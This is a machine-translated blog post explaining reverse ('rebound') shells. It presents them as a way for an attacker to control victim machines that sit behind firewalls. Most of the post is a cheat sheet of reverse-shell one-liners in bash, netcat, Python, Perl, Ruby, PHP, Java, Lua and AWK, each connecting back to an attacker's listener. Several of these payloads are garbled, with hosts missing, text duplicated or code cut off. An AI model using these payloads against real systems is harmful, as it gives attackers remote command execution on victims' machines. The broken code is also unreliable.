Penetration-N rebound shell methods

1, What is a rebound shell?

The reverse shell is that the control end listens to a TCP/UDP port, the controlled end initiates a request to the port, and transfers the input and output of its command line to the control end.

The reverse shell corresponds to standard shells such as telnet and SSH. In essence, it is the role reversal of the client and server of the network concept.

2, Why bounce shell?

Why bounce shell?  
It is usually used for the controlled end due to limited firewall, insufficient permissions, port occupation, etc.
For example, suppose we attack a machine and open a port of the machine. The attacker connects to the target machine (target ip: target machine port) on his own machine. This is a conventional form, which we call forward connection. Remote desktop, web service, ssh, telnet, etc. are all forward connections. Under what circumstances can forward connection not be used?  
There are the following situations:

There are the following situations:

  • A client has your network horse, but it is in the LAN, and you can't connect directly.
  • The ip of the target machine changes dynamically and you can't control it continuously.
  • Due to restrictions such as firewall, the other machine can only send requests and cannot receive requests.
  • For viruses, Trojans, when the victim can be recruited, what the other party's network environment is, when to switch on and off, etc. are unknown. Therefore, it is the best policy to establish a server and let the malicious program actively connect.
  • Then the rebound is well understood. The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called rebound connection.

3, bash

Perform port listening on the attack host:      // Port is the port number of the attack host, and this port number is not occupied

nc -lvvp 1000

On the target host:

Bash - I > & / dev / TCP / attack host IP / port 0 > & 1                            // Port is the port number of the attack host

  4, nc(netcat) bounce

Perform port listening on the attack host:

nc -lvvp port                              // Port is the port number of the attack host, and this port number is not occupied


On the target host:

nc -e /bin/bash attack host ip port

5, Common script bounce  

The above script is executed on the target host, where x.x.x.x is the ip of the attack host, and it is necessary to listen to the relevant ports on the attack host in advance. I won't repeat it next

1. python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'

2. perl

Method 1:

perl -e 'use perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Method 2:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

3. Ruby

ruby -rsocket -e 'exit if fork;"","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end'

4. PHP

php -r '$sock=fsockopen("",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

5. Java

public class Revs {
    * @param args
    * @throws Exception 
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);

6. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

7. AWK rebound

The attack machine listens. When receiving the shell, you can't enter, otherwise it will be disconnected

awk 'BEGIN{s="/inet/tcp/0/";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

Tags: Linux Operation & Maintenance server

Posted on Fri, 26 Nov 2021 09:47:58 -0500 by jaql